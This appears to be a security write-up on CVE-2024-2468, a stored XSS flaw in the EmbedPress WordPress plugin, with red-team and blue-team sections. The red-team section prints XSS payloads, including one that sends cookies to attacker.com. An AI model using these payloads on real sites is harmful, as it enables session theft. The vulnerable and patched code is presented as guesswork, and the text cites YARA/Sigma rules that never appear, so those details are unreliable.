CVE-2024-2468
Executive Summary
CVE-2024-2468 is a Stored Cross-Site Scripting (XSS) vulnerability in the EmbedPress WordPress plugin (versions up to and including 3.9.12). The flaw resides in the embedpress_pro_twitch_theme attribute of the EmbedPress widget. Insufficient input sanitization and output escaping allow authenticated attackers with contributor-level or higher permissions to inject arbitrary web scripts. When a user accesses a page containing the malicious payload, the script executes in their browser, potentially leading to session hijacking, credential theft, or defacement.
This vulnerability is specific to the WordPress ecosystem and does not affect Apache or Nginx directly. The plugin is widely used for embedding various media types (PDF, Google Docs, Vimeo, YouTube, etc.) in Gutenberg and Elementor editors.

Supply Chain & Package Security
- Plugin Type: WordPress plugin (PHP/JavaScript).
- Distribution: WordPress Plugin Repository.
- Risk: Compromised plugin updates or malicious forks could introduce backdoors. Users should verify plugin integrity via checksums and only install from official sources.
CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor+)
- User Interaction: None
- Scope: Changed (impact on other components)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. While the CVSS score is moderate, the ability to execute arbitrary scripts in the context of authenticated users (including admins) can lead to privilege escalation or data theft.
Deep Dive & Mechanics
The vulnerability exists in the embedpress plugin's widget rendering logic. The embedpress_pro_twitch_theme attribute is used to specify a Twitch theme (e.g., "dark" or "light"). However, the plugin fails to sanitize or escape this attribute before outputting it in the HTML.
Root Cause: The attribute value is directly concatenated into a JavaScript or HTML context without proper escaping. For example, the code might look like:
echo '<div class="embedpress-twitch" data-theme="' . $attributes['embedpress_pro_twitch_theme'] . '">';
An attacker can inject a payload like:
" onmouseover="alert('XSS')"
This results in:
<div class="embedpress-twitch" data-theme="" onmouseover="alert('XSS')">
When a user hovers over the element, the script executes.
Attack Flow:
- Attacker with contributor-level access creates or edits a post/page.
- Inserts the EmbedPress widget and sets the
embedpress_pro_twitch_themeattribute to a malicious payload. - The payload is stored in the database.
- When any user (including admins) views the page, the script executes in their browser.
Vulnerable vs. Patched Code
Vulnerable Code (<= 3.9.12):
// In embedpress/EmbedPress/Shortcode.php or similar
$theme = $attributes['embedpress_pro_twitch_theme'];
echo '<div class="embedpress-twitch" data-theme="' . $theme . '">';
Patched Code (Hypothetical):
$theme = esc_attr($attributes['embedpress_pro_twitch_theme']);
echo '<div class="embedpress-twitch" data-theme="' . $theme . '">';
The esc_attr() function escapes HTML attributes, preventing XSS. Alternatively, using wp_kses() or htmlspecialchars() would also mitigate the issue.
Exploitation & Lab Setup
Red Team (Attack Simulation)
Prerequisites:
- WordPress site with EmbedPress <= 3.9.12.
- Contributor-level account or higher.
Steps:
- Log in as a contributor.
- Create a new post or edit an existing one.
- Add the EmbedPress block/widget.
- In the block settings, locate the
Twitch Themefield. - Inject the following payload:
" onfocus="alert(document.cookie)" autofocus=" - Publish or save the post.
- When any user views the post, the script executes (e.g., on page load due to
autofocus).
Advanced Payload:
" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" src="x
Lab Setup:
- Use a local WordPress instance (e.g., via Docker).
- Install EmbedPress 3.9.12.
- Create a test user with contributor role.
- Use a browser with developer tools to inspect the injected attribute.
Blue Team (Detection & Response)
Detection:
- Monitor for posts/pages containing suspicious HTML attributes (e.g.,
onmouseover,onfocus,onerror). - Look for unusual
embedpress_pro_twitch_themevalues in the database.
Response:
- Immediately remove the malicious post/page.
- Revoke the contributor's access if compromised.
- Apply the patch (if available) or disable the plugin.
Indicators of Compromise (IOCs)
- File:
wp-content/plugins/embedpress/EmbedPress/Shortcode.php(or similar) containing unsanitized attribute output. - Database: Posts/pages with
embedpress_pro_twitch_themecontaining HTML event handlers. - Network: Outbound requests to attacker-controlled domains (if payload exfiltrates data).
- Logs: WordPress audit logs showing post creation/editing by contributor accounts with unusual attribute values.

Remediation & Mitigation
Immediate Actions:
- Disable the plugin if no patch is available.
- Restrict contributor-level access to trusted users only.
- Audit existing posts/pages for malicious payloads using the YARA/Sigma rules above.
Long-term Fix:
- Apply the vendor patch when released (expected in version 3.9.13 or later).
- Implement a Web Application Firewall (WAF) rule to block requests containing
embedpress_pro_twitch_themewith suspicious patterns.
Workaround:
- Use a security plugin (e.g., Wordfence) to block XSS attempts.
- Manually edit the plugin file to add
esc_attr()around the attribute value (not recommended for production without testing).
